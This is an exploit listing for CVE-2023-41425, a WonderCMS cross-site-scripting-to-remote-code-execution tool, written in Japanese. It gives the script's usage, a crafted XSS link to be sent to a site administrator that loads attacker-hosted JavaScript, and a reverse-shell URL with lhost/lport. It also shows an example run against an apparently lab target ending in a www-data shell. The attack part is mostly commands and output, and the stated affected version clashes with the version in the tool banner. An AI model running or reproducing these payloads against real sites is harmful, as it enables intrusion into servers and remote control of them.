Sploitus

Exploit for CVE-2023-41425

kitploit · 2026-09-04

Exploit Code

MARKDOWN115 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DUCK-SEC-CVE-2023-41425
# CVE-2023-41425

## 説明

Wonder CMS バージョン3.2.0から3.4.2におけるクロスサイトスクリプティングの脆弱性により、リモート攻撃者がinstallModuleコンポーネントにアップロードされた細工されたスクリプトを介して任意のコードを実行できる可能性があります。  
これはprodigiousMindによるオリジナルのエクスプロイトの修正版であり、外部インターネット接続に依存せずにエクスプロイト全体をローカルで提供できるように拡張されています。

もしあなたが途方に暮れていて、自転車に問題を見つけた場合に便利です...

注: xss.jsはデモンストレーション用にリポジトリに残されています。スクリプトを実行すると、あなたの設定で上書きされます。

## 使用方法

root@kitploit:~
    
    
    usage: exploit.py [-h] -u URL -lh LHOST -lp LPORT -sh SRVHOST -sp SRVPORT
    
    WonderCMS 4.3.2 XSS to RCE Exploit
    
    options:
      -h, --help            show this help message and exit
      -u URL, --url URL     The login URL of the WonderCMS site (e.g., http://localhost/wondercms/loginURL)
      -lh LHOST, --lhost LHOST
                            The IP address for the reverse shell listener
      -lp LPORT, --lport LPORT
                            The port for the reverse shell listener
      -sh SRVHOST, --srvhost SRVHOST
                            The local IP serving the malicious XSS JavaScript
      -sp SRVPORT, --srvport SRVPORT
                            The local port serving the malicious XSS JavaScript
    

## 例

注: このエクスプロイトは動作がかなり遅い場合があります!

root@kitploit:~
    
    
    $python3 exploit.py -u http://sea.htb/loginURL  -lh 10.10.14.101 -lp  7777  -sh 10.10.14.101 -sp 8888
    ##################################
    # Wondercms 4.3.2 XSS to RCE     #
    # Original POC by prodigiousMind #
    # Updated version by Ducksec     #
    ##################################
    
    
    Check you got this stuff right!
    
    
    Parsed arguments:
    URL: http://sea.htb/loginURL
    LHOST: 10.10.14.101
    LPORT: 7777
    SRVHOST: 10.10.14.101
    SRVPORT: 8888
    
    
    [+] xss.js is created
    [+] Execute the below command in another terminal:
    
    ----------------------------
    nc -lvp 7777
    ----------------------------
    
    Send the below link to admin:
    
    ----------------------------
    http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.101:8888/xss.js"></script><form+action="
    ----------------------------
    
    
    
    [+] Ensure that main.zip is still in this directory.
    [+] Once the target successfully requests main.zip it's safe to kill this script.
    
    
    [+] Once complete, you can also re-exploit by requesting: http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.101&lport=7777
    
    Starting HTTP server to allow access to xss.js
    Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
    10.129.178.129 - - [02/Oct/2024 14:39:51] "GET /xss.js HTTP/1.1" 200 -
    10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
    10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
    10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
    10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
    

root@kitploit:~
    
    
    $nc -nvlp 7777
    listening on [any] 7777 ...
    connect to [10.10.14.101] from (UNKNOWN) [10.129.178.129] 39958
    Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
     13:40:01 up 4 min,  0 users,  load average: 0.93, 0.49, 0.20
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ whoami
    www-data
    

## 参考文献

  1. https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413
  2. https://github.com/WonderCMS/wondercms/releases/tag/3.4.3



## 免責事項

このコードは教育および倫理的なセキュリティテストの目的のみで提供されています。責任を持って使用し、明示的な許可が与えられた環境でのみ使用すべきです。許可のない悪意のある使用は固く禁じられています。このコードを使用することにより、お住まいの地域で適用されるすべての法律、規制、および倫理基準を遵守することに同意したものとみなされます。作成者および貢献者は、このコードの誤用または不正使用に起因するいかなる損害または結果についても責任を負いません。